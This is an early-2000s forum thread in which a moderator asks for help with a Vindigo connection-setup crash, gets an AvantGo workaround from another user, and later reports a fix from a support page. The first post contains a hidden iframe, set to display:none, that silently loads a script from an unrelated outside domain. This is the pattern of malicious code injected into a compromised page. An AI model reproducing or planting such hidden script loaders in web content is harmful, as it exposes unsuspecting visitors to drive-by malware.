+ Reply to Thread
Results 1 to 4 of 4
  1. #1
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914

    Feeling vindictive about Vindigo

    Hi guys,
    I need your help...
    I just purchased Vindigo for the very first time and I am excited to start using it, but during installation, I ran into a problem.

    I was doing the initial step where you click on the button that says "To set up and test ('configure') your connection to Vindigo". I clicked on it, it tried to test the connection through my computer (not hotsync) and then the old Windows "This software has committed an illegal error... It will be shut down immediately".

    I have tried many times and I can't get past this.

    I clicked on the error messages "More Details" button and this is what it said...
    NDIGOLINK caused an invalid page fault in
    module KERNEL32.DLL at 019f:bff7b992.
    Registers:
    EAX=00000020 CS=019f EIP=bff7b992 EFLGS=00010202
    EBX=8198175c SS=01a7 ESP=01affc3c EBP=009d0b20
    ECX=00446358 DS=01a7 ESI=00000020 FS=43bf
    EDX=dc0234e0 ES=01a7 EDI=8193f19c GS=0000
    Bytes at CS:EIP:
    80 3e 04 74 0f 33 c0 50 50 50 68 05 00 00 c0 e8
    Stack dump:
    00000000 0042cded 00000020 00428778 00000000 8193f19c 00000008 8198175c 00405c38 00000000 004435b8 009d0b20 00000002 00000000 00000008 01afffcc

    I have no idea what any of that means, but I know that Vindigo shouldn't have any trouble finding a server connection because I have broadband cable and never have trouble getting online.

    Then if I click on "VindigoLink" on my PC, it asks me to type in my "Enabled Server". I'm not exactly sure what they want. My PC's IP address?

    Has anyone else run into this problem? And why the "illegal" error everytime?They make it sound like Vindigo is selling crack rock out of a van in my driveway or something.

    Thanks,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ~'kito
    pdaPhoneHome Moderator

  2. #2
    Registered User
    Join Date
    08-21-2002
    Location
    Chicago, IL
    Posts
    38
    I did not have the serious error that you are speaking of, but I was never able to get Vindigo’s Vindigo Link software to work behind our company firewall – which requires a password to access the Internet. I tried all the settings, but could never get it to work.

    I use Avantgo’s “Avantgo Connect” and set up Vindigo as an additional server. It works just fine. Do you already use Avantgo? You may want to try it to see if it avoids this error.

    Under the Servers tab:

    Add a server…
    Hostname: www.vindigo.com
    Port: 80
    Your account username (which is your username at Vindigo): xxx
    You have to click the Set Password button to provide the password that you use to login to Vindigo

    Under the Connection tab:
    It gives you the ability to set up your proxy settings – including the ability to assign a Firewall username and password – but if you already have Avantgo working – than this will already be set up.

    Something to try...

  3. #3
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Thanks Erik.
    I was just about to install AvantGo anyway. I'll see how it goes. A very clever workaround I must say.
    ~'kito
    pdaPhoneHome Moderator

  4. #4
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Erik,
    Your clever workaround worked just great... but I find that AvantGo takes up more RAM real estate than I would like (even without subscribing to any channels).

    So I wanted to get rid of AvantGo, but still have a working connection. Well, I finally found this and it worked!

    http://vindigo.custhelp.com/cgi-bin/...YWdlPTE*&p_li=


    I'm all set. But I appreciate your help.
    ~'kito
    pdaPhoneHome Moderator

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts